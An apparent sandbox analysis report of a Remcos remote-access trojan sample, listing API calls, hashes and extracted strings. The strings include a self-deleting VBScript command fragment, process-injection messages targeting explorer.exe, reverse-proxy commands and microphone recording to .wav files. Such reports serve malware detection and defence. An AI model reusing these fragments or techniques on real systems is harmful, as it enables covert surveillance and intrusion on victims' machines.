                                                                                                                                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                              • API String ID: 1913171305-390638927
                                                                                                                                                                                              • Opcode ID: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                                                                                                                                                              • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                                                                                                                                                              • Opcode Fuzzy Hash: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                                                                                                                                                              • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                              • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 0040481F
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404856
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404867
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 0040486E
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404880
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404885
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040488A
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404895
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040489A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3658366068-0
                                                                                                                                                                                              • Opcode ID: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                                                                                                                                                              • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                                                                                              • Opcode Fuzzy Hash: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AA6
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454AAD
                                                                                                                                                                                              • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454AC3
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454ACC
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00454C36
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00454C68
                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00454C6F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                                                                                                              • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                              • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                                                                                                                                                              • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 65535$udp
                                                                                                                                                                                              • API String ID: 0-1267037602
                                                                                                                                                                                              • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                              • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
• GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
• __dosmaperr.LIBCMT ref: 004393DD
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
• GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
• __dosmaperr.LIBCMT ref: 0043941A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
• GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
• __dosmaperr.LIBCMT ref: 0043946E
• _free.LIBCMT ref: 0043947A
• _free.LIBCMT ref: 00439481
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• API String ID: 2441525078-0
APIs
• SetEvent.KERNEL32(?,?), ref: 00404E71
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
• TranslateMessage.USER32(?), ref: 00404F30
• DispatchMessageA.USER32(?), ref: 00404F3B
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
• CloseHandle.KERNEL32(00000000), ref: 00416F2D
• DeleteFileA.KERNEL32(00000000), ref: 00416F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
• String ID: <$@$@FG$@FG$Temp
• API String ID: 1107811701-2245803885
APIs
• GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
• GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\4XYAW8PbZH.exe), ref: 00406705
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
• API String ID: 2050909247-4145329354
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• API String ID: 221034970-0
APIs
• _free.LIBCMT ref: 00446DEF
  • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
• _free.LIBCMT ref: 00446DFB
• _free.LIBCMT ref: 00446E06
• _free.LIBCMT ref: 00446E11
• _free.LIBCMT ref: 00446E1C
• _free.LIBCMT ref: 00446E27
• _free.LIBCMT ref: 00446E32
• _free.LIBCMT ref: 00446E3D
• _free.LIBCMT ref: 00446E48
• _free.LIBCMT ref: 00446E56
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• API String ID: 776569668-0
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
• API String ID: 3578746661-4192532303
                                                                                                                                                                                              • Opcode ID: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                              • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                              • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                                                              • Opcode ID: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                              • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                              • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                              • API String ID: 1462127192-2001430897
                                                                                                                                                                                              • Opcode ID: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                                                                                                                                                              • Instruction ID: c19d1c6df4eaf99de932d1d3e2b79d277c3c3ae54bcdefde962c91a872100eda
                                                                                                                                                                                              • Opcode Fuzzy Hash: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B313E719001085ADB14FBA1DC96EEE7764AF50708F00017FF906730E2EF786A8ACA9D
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                              • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                              • API String ID: 3809562944-3643129801
                                                                                                                                                                                              • Opcode ID: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                              • Instruction ID: 71dc54c49c3278552d12686eedaa48b86947864de512bb92fe626abde6f710f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: e0dce4da6f9c26f4323f2fcef848ed48a874295c1d3fb801fba6060ecdae05f5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98317E315053009BC314EF25DC56A9E77E8BB94314F40883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                              • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                              • String ID: XCG$`=G$x=G
                                                                                                                                                                                              • API String ID: 1356121797-903574159
                                                                                                                                                                                              • Opcode ID: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                              • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                                                                                              • Opcode Fuzzy Hash: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                                                                                                • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                                                                                              • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                              • String ID: Remcos
                                                                                                                                                                                              • API String ID: 1970332568-165870891
                                                                                                                                                                                              • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                              • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                              • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                                                                                              • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                                                                                              APIs
• GetCPInfo.KERNEL32(?,?), ref: 00452BE6
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C69
• __alloca_probe_16.LIBCMT ref: 00452CA1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CFC
• __alloca_probe_16.LIBCMT ref: 00452D4B
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D13
  • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D8F
• __freea.LIBCMT ref: 00452DBA
• __freea.LIBCMT ref: 00452DC6
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
• String ID:
• API String ID: 3256262068-0
APIs
  • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
  • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
  • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
  • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
• _memcmp.LIBVCRUNTIME ref: 004446B3
• _free.LIBCMT ref: 00444724
• _free.LIBCMT ref: 0044473D
• _free.LIBCMT ref: 0044476F
• _free.LIBCMT ref: 00444778
• _free.LIBCMT ref: 00444784
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
APIs
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
• MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
• CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
• DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
• String ID: .part
• API String ID: 1303771098-3499674018
APIs
  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
  • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
• _wcslen.LIBCMT ref: 0041A906
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue_wcslen
• String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
• API String ID: 37874593-703403762
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
• __alloca_probe_16.LIBCMT ref: 004499F2
